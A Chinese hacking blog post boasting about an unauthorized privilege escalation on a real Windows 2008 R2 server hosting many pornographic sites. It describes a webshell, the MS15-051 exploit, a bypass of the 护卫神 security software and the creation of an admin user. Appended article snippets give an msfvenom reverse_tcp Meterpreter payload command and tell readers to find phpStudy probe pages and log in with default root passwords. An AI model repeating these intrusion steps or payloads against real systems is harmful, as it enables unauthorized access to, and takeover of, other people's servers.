艰难提权某黄色网站服务器

手提liu百多个黄色网站De服务器。

#继昨晚之后再一次提下一个08r2服务器,这次实属不易从下午一两点到方才现在约晚上十一点,学到新姿势了,心情还是很不错的。故事是这样的,六点多钟睡觉的我,到了九点钟,还是翻来覆去想日站。行吧,起床!日站走起。

逼装完了,说过程吧。拿shell其实才是技术活,但并非我拿下的,是一个404团队的朋友。

依旧第一部是收集信息;

》》》3306,3389,都是开了的。

看着好像是内网,实则不然。

辛亏我去连接了一下的。

ipconfig查看一下。

我以为打错了打成了systeminfo,结果加载好一会儿。IPV6都出来了。元芳你怎么看?聪明的我察觉,这特么的是个站群。

行吧。那就打一下systemeinfo

卧槽你妈的。心情好激动。一个补丁。exp直接秒了。

因为有护卫神还是找帅哥借了过护卫神的马子的。1.exe是ms15051.兴高采烈的执行可爱的exp

换个cmd

上aspwebshell。找个可执行的地儿去。结果发现。。并没有这个地。

一开始我以为是护卫神的缘故,护卫神吧exp拦截了。所以i一直忙活找大牛索要过护卫神的exp。故不由得浪费了很多时间。然而最终要没有要到。时间花了。看看数据库吧。

说开了3306的呢。也是并没有什么卵用。是同服务器的开了,但所在的网站并没有开。想要日旁站,可站长之家,却查不到旁站信息.....

这就尴尬了。明明有,而且很多。94查不到。那也没办法了。在信息中看到mysql的地址,目录由于权限问题,也跨不过去,暂且记录吧,

翻来覆去都无果。

直至今天晚上谋牛上线了,我便问了一下我表哥。表哥弄了半天也没辙。然后问了一下表哥的表哥,居然秒提了。

但是由于这个站666.我表哥好像不大愿意跟我说咋搞的,

不说就不说。麻痹的。最后给了些提示。

对于流这个鬼东西我特么的是零概念。NTSD又是什么玩意儿。

莫非不是这样的?

结束进程,这就尴尬了。结束他干嘛?

好吧。关键词是“突破建立一个文件夹”不就一个文件夹吗?webshell秒完成,还有突破。果不其然。建立失败了。

后来我用cmdshell在磁盘的跟目录建立,就可以了。

>>>md 123

居然成功建立。

之前是因为文件的关系具有继承系。我所在网站的权限也是被固定了得,纵使能建立也没卵用。

然后再123里放exp

就可以执行了。

再次执行。

拿下。

建立用户。

时间: 2024-10-13 00:05:22

艰难提权某黄色网站服务器的相关文章

【实战】一次艰难的入侵提权,成功拿下服务器

前言:这是在51CTO的第10篇文章,给大家来点给力的哈~这次的入侵检测在提权反弹连接上遇到了很多问题,让窝娓娓道来. Let's Go! 一,对目标网站的信息收集. http://www.XXXXX.cn  IP:122.225.XX.XXX [浙江省嘉兴市 电信] Server OS : Microsoft Windows NT 5.2.3790 Service Pack 2(xp || win server 03 sp1 or sp2)        Server Software : M

提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的普通用户提升为管理员用户的一种操作,提权常常用于辅助旁注攻击. 下面我们来了解下window的权限(来自百度百科): Windows 提供了非常细致的权限控制项,能够精确定制用户对资源的访问控制能力,大多数的权限从其名称上就可以基本了解其所能实现的内容. " 权限"(Permission)

用MSF进行提权

在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe 然后在到MSF根据刚才配置的木马后门进行监听...

利用phpStudy 探针 提权网站服务器

声明: 本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途! 今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的.记录一下吧. 搜索引擎KeyWord: phpStudy 探针 2014 多往后翻翻.翻个几十页最好. 点开搜索到的内容. 点开搜索到的内容. 翻到最下面,尝试连接mysql数据库是否正常(账号密码默认为:root): 1. 如果提示正常.请在网页后面加上 'phpmyadmin',如 http:

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

本文作者:i春秋签约作家--酷帥王子 一. 利用getwebshell篇 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 下面我们构造一个asp目录,如: http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp

最全的服务器提权

最全的WEBSHELLc: d: e:..... -------------------------------------------------------------------C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\

soap注入某sql2008服务器结合msf进行提权

soap注入某sql2008服务器结合msf进行提权 simeon 在实际成功×××过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次×××利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075的提权,最终获取了目标服务器的系统权限.本文算是漏洞利用的一个新的拓展,在常规Nday提权不成功的情况下,结合msf进行ms16-075成功提权的一个经典案例. 1.1.1扫描soap注入漏洞 1.使用awvs中的web services scann

17_服务器提权

当我们拿到webshell之后,下一步该干什么了?权限提升 水平权限提升(通过控制一个账户来搞定其他的账户)  垂直权限提升(从单一用户权限提升至完全管理权限) 主机权限提升(重点介绍) 一.主机权限提升 1.分类 Linux提权 Windows提权 2.Windows提权(前提是:有操作系统漏洞,其次是想办法执行cmd) 操作系统漏洞提权 第三方服务提权 3.Windows操作系统漏洞 根据没有修补的补丁号码,到网上找利用程序,进行利用. systeminfo  查看系统信息 查看修补的补丁编

峰回路转的提权08r2服务器

事前日下这个站的时候说实话,略微的蛋疼.其过程就不写了,就讲讲提权吧.可能图片有点暗.看看我写这篇文章的时候就知道了. 这个学校我好多同学在里面读书,就萌生了.日下这个站的想法. 拿到shell,理所应当的是收集信息了. 2008r2的,哇靠哦.我第一反应就是再看看端口,因为一般08r2的exp能用的不多.先看看有没有waf. 第一个大家并不陌生,360嘛.至于第二个,可能有部分的同学不知道.是一个很出名的远控软件.速度相对比其他的好得多,你懂的.但是呢,有一个exp可以读取其账户资料的.也就是